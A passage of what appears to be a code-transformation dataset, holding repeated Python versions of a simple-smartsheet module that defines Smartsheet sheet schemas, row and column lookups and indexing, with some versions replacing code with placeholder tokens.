self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\nif TYPE_CHECKING:\n try:\n import pandas as pd\n except ImportError:\n pass\nlogger = logging.getLogger(__name__)\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key='criticalPathEnabled')\n display_summary_tasks = fields.Bool(data_key='displaySummaryTasks')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\nRowT = TypeVar('RowT', bound=_RowBase[Any])\nColumnT = TypeVar('ColumnT', bound=Column)\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\nif TYPE_CHECKING:\n try:\n import pandas as pd\n except ImportError:\n pass\n<assignment token>\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key='criticalPathEnabled')\n display_summary_tasks = fields.Bool(data_key='displaySummaryTasks')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key='criticalPathEnabled')\n display_summary_tasks = fields.Bool(data_key='displaySummaryTasks')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n 